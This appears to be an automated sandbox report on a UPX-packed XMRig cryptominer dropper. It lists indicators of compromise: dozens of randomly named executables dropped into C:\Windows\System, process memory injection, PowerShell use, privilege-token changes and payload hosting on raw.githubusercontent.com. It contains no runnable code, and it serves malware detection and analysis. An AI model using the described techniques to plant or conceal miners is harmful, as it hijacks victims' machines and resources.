Malware Analysis Report

2025-03-15 00:08

Sample ID 240603-1yg8xaaf4s
Target fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe
SHA256 fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c
Tags
miner upx xmrig execution persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c

Threat Level: Known bad

The file fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution persistence

XMRig Miner payload

Suspicious use of NtCreateUserProcessOtherParentProcess

xmrig

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Modifies Installed Components in the registry

Blocklisted process makes network request

UPX packed file

Executes dropped EXE

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy service COM API

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Modifies registry class

Uses Volume Shadow Copy WMI provider

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 22:03

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 22:03

Reported

2024-06-03 22:04

Platform

win10v2004-20240508-en

Max time kernel

61s

Max time network

64s

Command Line

C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 13192 created 60 N/A C:\Windows\system32\WerFaultSecure.exe C:\Windows\system32\svchost.exe

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\axVNZQz.exe N/A
N/A N/A C:\Windows\System\aPjGTGe.exe N/A
N/A N/A C:\Windows\System\EWdOxVy.exe N/A
N/A N/A C:\Windows\System\brHqTLB.exe N/A
N/A N/A C:\Windows\System\IBMKRWO.exe N/A
N/A N/A C:\Windows\System\sOalaow.exe N/A
N/A N/A C:\Windows\System\qndCowM.exe N/A
N/A N/A C:\Windows\System\PpisgNH.exe N/A
N/A N/A C:\Windows\System\urUyRME.exe N/A
N/A N/A C:\Windows\System\nwWVnrF.exe N/A
N/A N/A C:\Windows\System\OwTpFMC.exe N/A
N/A N/A C:\Windows\System\SwCQmTw.exe N/A
N/A N/A C:\Windows\System\bLpZMhH.exe N/A
N/A N/A C:\Windows\System\pyyHgjv.exe N/A
N/A N/A C:\Windows\System\Burqpzn.exe N/A
N/A N/A C:\Windows\System\XDZxNQE.exe N/A
N/A N/A C:\Windows\System\OuNGpZq.exe N/A
N/A N/A C:\Windows\System\ILGXdDw.exe N/A
N/A N/A C:\Windows\System\TAOyIgC.exe N/A
N/A N/A C:\Windows\System\RdtjIlK.exe N/A
N/A N/A C:\Windows\System\qUtHKyC.exe N/A
N/A N/A C:\Windows\System\ygtUIca.exe N/A
N/A N/A C:\Windows\System\JJjLlUH.exe N/A
N/A N/A C:\Windows\System\ScQKdch.exe N/A
N/A N/A C:\Windows\System\trEJEmh.exe N/A
N/A N/A C:\Windows\System\nKADzeH.exe N/A
N/A N/A C:\Windows\System\ybHZLWM.exe N/A
N/A N/A C:\Windows\System\AmtaodT.exe N/A
N/A N/A C:\Windows\System\RLvenfC.exe N/A
N/A N/A C:\Windows\System\whoZHnc.exe N/A
N/A N/A C:\Windows\System\zoOJLVN.exe N/A
N/A N/A C:\Windows\System\SyqIKiE.exe N/A
N/A N/A C:\Windows\System\JwmkKWr.exe N/A
N/A N/A C:\Windows\System\uomMsCL.exe N/A
N/A N/A C:\Windows\System\qfsgPNK.exe N/A
N/A N/A C:\Windows\System\ZLHJgrb.exe N/A
N/A N/A C:\Windows\System\UpmNNNc.exe N/A
N/A N/A C:\Windows\System\jSHSNNo.exe N/A
N/A N/A C:\Windows\System\KjzBcML.exe N/A
N/A N/A C:\Windows\System\bxLGsnI.exe N/A
N/A N/A C:\Windows\System\HghtKZy.exe N/A
N/A N/A C:\Windows\System\HlheYaz.exe N/A
N/A N/A C:\Windows\System\DtakIIV.exe N/A
N/A N/A C:\Windows\System\KSLmDSj.exe N/A
N/A N/A C:\Windows\System\UVEbZRA.exe N/A
N/A N/A C:\Windows\System\EYBfZjX.exe N/A
N/A N/A C:\Windows\System\eRDrLDn.exe N/A
N/A N/A C:\Windows\System\Eokyjbl.exe N/A
N/A N/A C:\Windows\System\mgRmMZb.exe N/A
N/A N/A C:\Windows\System\nOqNTFJ.exe N/A
N/A N/A C:\Windows\System\glLEVTL.exe N/A
N/A N/A C:\Windows\System\CplFYAK.exe N/A
N/A N/A C:\Windows\System\uZyViSu.exe N/A
N/A N/A C:\Windows\System\zbFLVEz.exe N/A
N/A N/A C:\Windows\System\uoPtpCa.exe N/A
N/A N/A C:\Windows\System\seXQAAj.exe N/A
N/A N/A C:\Windows\System\IlhRTZJ.exe N/A
N/A N/A C:\Windows\System\mnIGCht.exe N/A
N/A N/A C:\Windows\System\PFwZwRy.exe N/A
N/A N/A C:\Windows\System\buusUZo.exe N/A
N/A N/A C:\Windows\System\ErfkTej.exe N/A
N/A N/A C:\Windows\System\TRdfIRQ.exe N/A
N/A N/A C:\Windows\System\BKhgDAT.exe N/A
N/A N/A C:\Windows\System\zgMDbxO.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\xBtgSJu.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\WcWEwEq.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ATWchUk.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\tGbpVWC.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\jlGKfOK.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\LbXhnpt.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\kRnXkcJ.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\AmXFejF.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\rSLCUnQ.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\lOwtNmu.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ZFueTKV.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\neJyWuQ.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\AeaYouB.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\QdTxhQw.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\DlYRorv.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\CAGlTXr.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\hHdWFAN.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ArvkLiO.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\mfcIPFI.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\flRnZgT.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\rxNiXXN.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\oknJpVE.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\CcULsYY.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\NmZlgrX.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\VLFbrTp.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\SNemcvV.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\qyMgsxg.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\VyhpqSF.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\bFgIOnA.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\qeoXQkg.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\EhLxRpR.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\emWrcem.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\kmqJlmx.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\NMwrraT.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\quinWhz.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\TEMQYpa.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\XYVzKIj.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\UiKDEmC.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\PNomFRT.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\WqLeWDc.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\ccaeZFG.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\LGhyLET.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\XsAHXyj.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\KuwAWsw.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\prMDJVk.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\xwrgUAI.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\shbgWYT.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\UbYZfrL.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\wQfktpV.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\lUbXKwE.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\RTPWUQs.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\FsjQoDy.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\udOEQCi.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\MoJsXjG.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\EyzcrOI.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\gcEpZry.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\fNKixQz.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\UgbwurI.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\nGweava.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\qaOZHHo.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\cNarVAI.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\RcVgBVv.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\txOPizH.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
File created C:\Windows\System\pIPrbal.exe C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFaultSecure.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFaultSecure.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFaultSecure.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFaultSecure.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFaultSecure.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3212 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3212 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3212 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\axVNZQz.exe
PID 3212 wrote to memory of 2452 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\axVNZQz.exe
PID 3212 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\aPjGTGe.exe
PID 3212 wrote to memory of 3304 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\aPjGTGe.exe
PID 3212 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\EWdOxVy.exe
PID 3212 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\EWdOxVy.exe
PID 3212 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\brHqTLB.exe
PID 3212 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\brHqTLB.exe
PID 3212 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\IBMKRWO.exe
PID 3212 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\IBMKRWO.exe
PID 3212 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\sOalaow.exe
PID 3212 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\sOalaow.exe
PID 3212 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\qndCowM.exe
PID 3212 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\qndCowM.exe
PID 3212 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\PpisgNH.exe
PID 3212 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\PpisgNH.exe
PID 3212 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\urUyRME.exe
PID 3212 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\urUyRME.exe
PID 3212 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\nwWVnrF.exe
PID 3212 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\nwWVnrF.exe
PID 3212 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\OwTpFMC.exe
PID 3212 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\OwTpFMC.exe
PID 3212 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\SwCQmTw.exe
PID 3212 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\SwCQmTw.exe
PID 3212 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\bLpZMhH.exe
PID 3212 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System\bLpZMhH.exe
